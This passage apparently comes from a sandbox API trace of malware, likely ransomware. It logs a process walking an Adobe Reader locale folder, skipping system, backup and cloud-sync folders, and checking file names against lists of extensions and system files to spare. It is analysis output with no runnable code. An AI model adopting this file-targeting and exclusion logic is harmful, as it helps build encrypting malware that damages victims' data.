ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.CHS", cAlternateFileName="")) returned 0 [0058.619] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.619] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0058.619] CharUpperBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchLength=0x26 | out: lpsz="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\") returned 0x26 [0058.619] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.619] CharUpperBuffW (in: lpsz="\\PERFLOGS\\", cchLength=0xa | out: lpsz="\\PERFLOGS\\") returned 0xa [0058.619] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="FILES\\ACRONIS\\", cchLength=0xe | out: lpsz="FILES\\ACRONIS\\") returned 0xe [0058.620] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.620] CharUpperBuffW (in: lpsz="(X86)\\ACRONIS\\", cchLength=0xe | out: lpsz="(X86)\\ACRONIS\\") returned 0xe [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="FILES\\BACKUPCLIENT\\") returned 0x13 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\BACKUPCLIENT\\", cchLength=0x13 | out: lpsz="(X86)\\BACKUPCLIENT\\") returned 0x13 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="FILES\\BACKUP MANAGER\\") returned 0x15 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\BACKUP MANAGER\\", cchLength=0x15 | out: lpsz="(X86)\\BACKUP MANAGER\\") returned 0x15 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\CARBONITE\\", cchLength=0x10 | out: lpsz="FILES\\CARBONITE\\") returned 0x10 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\CARBONITE\\", cchLength=0x10 | out: lpsz="(X86)\\CARBONITE\\") returned 0x10 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="FILES\\GOOGLE\\DRIVE\\") returned 0x13 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\GOOGLE\\DRIVE\\", cchLength=0x13 | out: lpsz="(X86)\\GOOGLE\\DRIVE\\") returned 0x13 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\DROPBOX\\", cchLength=0xe | out: lpsz="FILES\\DROPBOX\\") returned 0xe [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\DROPBOX\\", cchLength=0xe | out: lpsz="(X86)\\DROPBOX\\") returned 0xe [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="FILES\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="FILES\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.621] CharUpperBuffW (in: lpsz="(X86)\\MICROSOFT ONEDRIVE\\", cchLength=0x19 | out: lpsz="(X86)\\MICROSOFT ONEDRIVE\\") returned 0x19 [0058.621] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="FILES\\ONEDRIVE\\", cchLength=0xf | out: lpsz="FILES\\ONEDRIVE\\") returned 0xf [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="(X86)\\ONEDRIVE\\", cchLength=0xf | out: lpsz="(X86)\\ONEDRIVE\\") returned 0xf [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="VNC\\", cchLength=0x4 | out: lpsz="VNC\\") returned 0x4 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.622] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0058.622] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0058.623] CharUpperBuffW (in: lpsz="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\", cchLength=0x3d | out: lpsz="C:\\PROGRAM FILES (X86)\\ADOBE\\READER 10.0\\READER\\LOCALE\\ZH_TW\\") returned 0x3d [0058.623] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0058.624] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.626] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82fce7a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82fce7a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.626] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.CHT", cAlternateFileName="ACCESS~1.CHT")) returned 1 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", cchCount2=3) returned 1 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="CHT", cchCount2=3) returned 1 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="CHT", cchCount2=3) returned 3 [0058.626] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ACCESSIBILITY.CHT", cchCount2=17) returned 3 [0058.627] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c3c6a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.CHT", cAlternateFileName="")) returned 1 [0058.627] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="CHT", 